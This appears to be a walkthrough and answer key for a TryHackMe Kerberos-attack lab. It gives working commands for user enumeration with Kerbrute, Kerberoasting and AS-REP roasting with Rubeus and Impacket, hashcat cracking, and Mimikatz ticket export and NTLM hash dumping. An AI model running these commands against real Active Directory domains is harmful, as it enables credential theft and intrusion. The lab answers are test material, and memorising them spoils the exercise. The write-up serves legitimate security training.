This is the write-up for the room Attacking Kerberos on TryHackMe; it is part of the CompTIA PenTest+ path.
Connect to the TryHackMe lab environment through the VPN, or use the AttackBox on the TryHackMe site.
Task Attacking Kerberos
Task 1
Start the machine, then read everything in the task. Let's start attacking Kerberos.
1.1 What does TGT stand for?
A ticket-granting ticket is an authentication ticket used to request service tickets from the TGS for specific resources from the domain.
Answer: Ticket Granting Ticket
1.2 What does SPN stand for?
A Service Principal Name is an identifier that ties a service instance to the domain account the service runs under. The KDC uses the SPN to find that account and encrypts the service ticket with the account's key, which is why a service needs an SPN set before clients can request tickets for it.
Answer: Service Principal Name
1.3 What does PAC stand for?
Privilege Attribute Certificate (PAC) – The PAC holds the user's authorization information (SID, group memberships and related attributes). It is carried inside the ticket and is signed with the target service's long-term key and the KDC's long-term key so that the receiving service can validate the user.
Answer: Privilege Attribute Certificate
1.4 What two services make up the KDC?
The Key Distribution Center is the service that issues TGTs and service tickets; it consists of the Authentication Service and the Ticket Granting Service.
Answer: AS, TGS
Notice space after the ,
Task 2
As always when dealing with an Active Directory environment, first add the machine name to the hosts file:
nano /etc/hosts
Installing Kerbrute
Download the latest Linux release from https://github.com/ropnop/kerbrute/releases
Open a terminal and make the file executable by typing
chmod +x filename
You can rename the file to kerbrute for easy use. Copy it into your /opt directory:
mkdir /opt/kerbrute
cp kerbrute_linux_amd64 /opt/kerbrute/kerbrute
Now you can always find it in your /opt directory.
Now download the User.txt wordlist provided in this task:
wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/User.txt
Let's start enumerating user accounts. Kerbrute sends an AS-REQ without pre-authentication for every name in the list; the KDC answers PREAUTH_REQUIRED for accounts that exist and reports an unknown principal for those that do not, so valid usernames can be confirmed without a password and without risking account lockouts:
/opt/kerbrute/kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt -t 100
2.1 How many total users do we enumerate?
Answer: 10
2.2 What is the SQL service account name?
Answer: sqlservice
2.3 What is the second “machine” account name?
Answer: machine2
2.4 What is the third “user” account name?
Answer: user3
Task 3
SSH into the machine to complete this task:
ssh administrator@<Machine_IP>
cd Downloads
dir
Now we can harvest the tickets by entering the following command
Rubeus.exe harvest /interval:30
3.1 Which domain admin do we get a ticket for when harvesting tickets?
Answer: Administrator
3.2 Which domain controller do we get a ticket for when harvesting tickets?
Computer accounts always end with a $ sign.
Answer: CONTROLLER-a$
Task 4
Remember: any account with a registered SPN can be Kerberoasted, because any domain user can request a service ticket for that SPN and the ticket is encrypted with the account's password hash. Service accounts run under ordinary user accounts are the interesting targets, since their passwords are often weak and rarely rotated.
We still have the ssh session open. Type in the following
Rubeus.exe kerberoast
We now see the hashes of two service accounts. We can copy these hashes and crack them with hashcat. This approach requires Rubeus.exe to be on the target machine. With Impacket we can do the same remotely, but we need a valid domain credential to request the tickets.
Installing impacket
Install Impacket by entering the following commands
git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && python3 ./setup.py install
cd /opt/impacket/examples
Now run the following command (change the IP to that of your deployed machine):
sudo python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.142.212 -request
We now also see the two service accounts with their hashes.
Save the two hashes in separate files, each hash on a single line with no whitespace.
Now download the password list provided in the task by entering the command
wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/Pass.txt
4.1 What is the HTTPService Password?
Now that we have the hashes we can crack them:
hashcat -m 13100 -a 0 httphash.txt Pass.txt
hashcat prints the cracked hash followed by a colon and the plaintext password; once the status shows Cracked, hashcat --show -m 13100 httphash.txt prints the result again.
4.2 What is the SQLService Password?
hashcat -m 13100 -a 0 sqlhash.txt Pass.txt
Again, the password is the text after the colon that follows the hash in hashcat's output.
Task 5
SSH back into the deployed machine:
ssh administrator@MACHINE_IP
The credentials are the ones used in Task 3.
Once connected enter the following commands
cd Downloads
Rubeus.exe asreproast
This will spit out two hashes.
Copy each hash into a file on your Linux machine, named after the account found followed by .txt (for example user3.txt).
Insert 23$ after $krb5asrep$ so that the line starts with $krb5asrep$23$User…; Rubeus omits the encryption type (23 is RC4-HMAC) and hashcat mode 18200 expects it.
Make sure no spaces or line breaks are left in the hash when saving it to the text file; Rubeus wraps the hash over several lines.
5.1 What hash type does AS-REP Roasting use?
To answer this, look at the hashcat command we are using: it has -m 18200, meaning hash mode 18200. All hash modes are listed on the hashcat wiki page, in the output of hashcat --help, or via the man hashcat command.
Answer: Kerberos 5 AS-REP etype 23
5.2 Which User is vulnerable to AS-REP Roasting?
Answer: user3
5.3 What is the User’s Password?
Type in the following command
hashcat -m 18200 user3.txt Pass.txt
5.4 What is the Admin’s Password?
Type in the following command
hashcat -m 18200 Admin2.txt Pass.txt
Task 6
Follow along with the guide in this task.
To recap
Login with ssh to the machine deployed and run the following commands
cd Downloads
mimikatz.exe
privilege::debug
sekurlsa::tickets /export
To use an exported ticket and authenticate as that user (pass the ticket) we can use kerberos::ptt <ticket>
Task 7
Read all that is in the task and try to follow along
7.1 What is the SQLService NTLM Hash?
While still connected via ssh, type in the following command in mimikatz:
lsadump::lsa /inject /name:sqlservice
7.2 What is the Administrator NTLM Hash?
While still connected via ssh, type in the following command in mimikatz:
lsadump::lsa /inject /name:Administrator
Task 8
Read all that is in the task and press complete
Task 9
Read all that is in the task and press complete